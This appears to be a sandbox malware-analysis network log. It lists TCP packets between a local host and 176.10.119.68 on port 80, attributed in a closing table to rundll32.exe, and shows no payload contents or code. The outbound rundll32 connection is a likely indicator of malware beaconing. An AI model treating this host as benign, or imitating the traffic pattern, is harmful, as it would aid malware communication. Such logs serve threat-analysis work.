May 26, 2022 04:06:52.866168022 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866180897 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866226912 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866290092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866317034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866328955 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866350889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866367102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866388083 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.866405964 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.866425991 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.879981041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880027056 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880048990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880072117 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880095005 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880117893 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880134106 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880161047 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880187988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880209923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880247116 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880270004 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880280018 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880300045 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880315065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880337954 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880362988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880377054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880393028 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880410910 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880491018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880517960 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880563021 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880588055 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880609035 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880635023 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880640984 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880666018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880672932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880691051 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.880697012 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880721092 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.880738974 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.884610891 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892374039 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892416000 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892438889 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892461061 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892491102 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892505884 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892543077 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892566919 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892585993 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892606974 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.892664909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.892705917 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893610001 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893644094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893671989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893681049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893690109 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893712044 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893721104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893743038 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893752098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893774986 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893780947 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893795967 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.893811941 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.893831015 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894366980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894408941 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894433022 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894454002 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894471884 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894490004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894506931 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894524097 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894541025 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894547939 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894565105 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894576073 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894594908 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894603014 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894627094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894690990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894731998 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894741058 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894757032 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.894768000 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.894788027 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908045053 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908078909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908101082 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908149958 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908165932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908193111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908202887 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908226013 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908236027 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908252954 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908274889 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908296108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908459902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908502102 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908524990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908544064 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908555031 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908596992 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908607006 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908626080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908639908 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908670902 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908685923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908791065 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908808947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908849001 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908868074 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908880949 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.908905983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.908935070 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.909110069 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909157991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909176111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909187078 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.909210920 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.909239054 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.920998096 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921032906 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921047926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921060085 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921191931 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921210051 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921463013 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921484947 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921499968 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921511889 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.921552896 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.921600103 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.922487020 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922509909 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922525883 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922537088 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.922591925 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.922624111 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923270941 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923290014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923305988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923321009 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923336983 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923357010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923367977 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923382998 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923391104 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923425913 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923712969 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923732042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923748016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923758984 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.923772097 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.923825979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.924022913 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924041033 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924057007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924074888 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.924081087 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.924123049 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.935115099 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935152054 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935168982 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935182095 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.935283899 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.935326099 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937022924 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937042952 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937058926 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937074900 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937091112 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937105894 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937119007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937144041 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937202930 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937446117 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937463999 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937493086 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937503099 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937520981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937536955 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937546968 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937566042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.937582970 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937608004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.937628984 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938286066 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938302994 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938318014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938328981 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938360929 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938410044 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938601017 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938616991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938632965 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938643932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.938671112 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.938698053 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.949590921 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949631929 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949651003 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949672937 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949688911 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.949723959 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.949791908 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:53.058631897 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:53.071225882 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344055891 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344110012 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:53.344240904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:07:47.020793915 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49752 | 176.10.119.68 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 26, 2022 04:06:52.073632002 CEST | 1254 | OUT | |
May 26, 2022 04:06:52.343399048 CEST | 1256 | IN |